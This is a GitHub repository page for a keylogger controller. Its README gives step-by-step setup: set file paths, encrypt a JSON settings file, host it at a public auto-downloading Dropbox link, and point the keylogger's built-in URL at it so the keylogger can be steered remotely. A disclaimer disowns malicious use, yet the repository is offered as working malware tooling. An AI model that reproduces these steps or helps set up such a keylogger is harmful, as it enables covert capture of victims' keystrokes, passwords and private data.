Skip to content

The Controller for the Keylogger that controls its settings.

Notifications You must be signed in to change notification settings

000xE/KeyloggerController

Repository files navigation

KeyloggerController

The controller for the Keylogger, please ensure that the encrypted file is also the public link for the keylogger to grab and decrypt.

Things to do after downloading:

  1. Edit its local json file directory as well as where to encrypt it to
    • In classJsonObj: Change strJsonDir = @"ADDYOURDIRECTORYHERE" to a directory with the local Json file.
      • e.g strJsonDir = @"C\Users\TestUser\Folder\Controller.json"
    • In classJsonObj: Change strEncryptDir = @"ADDYOURDIRECTORYHERE" to a directory to save that Json file, encrypted.
      • e.g strEncryptDir = @"C\Users\TestUser\Folder\EncryptedJson.txt"
  2. Upload the encrypted json file onto a file hosting service like Dropbox, and get its public link (Must auto download!).
  3. Change KeyloggerRemake's encrypted key to the public link of the specified encrypted directory in the Controller
    • In classGetEncryption: Change strEncryptedFile = "ADDYOURURLHERE" to the public URL of that encrypted Json file.
      • e.g strEncryptedFile = "https://www.dropbox.com/s/dsdddq32re/EncryptedJson.txt?dl=1"
  4. Change settings in KeyloggerController upon runtime.

Packages used:

  • Newtonsoft.Json

Disclaimer:

I don't support the use of this keylogger in a malicious intent, and therefore I hold no responsibility as to what damage it may inflict upon others.

About

The Controller for the Keylogger that controls its settings.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages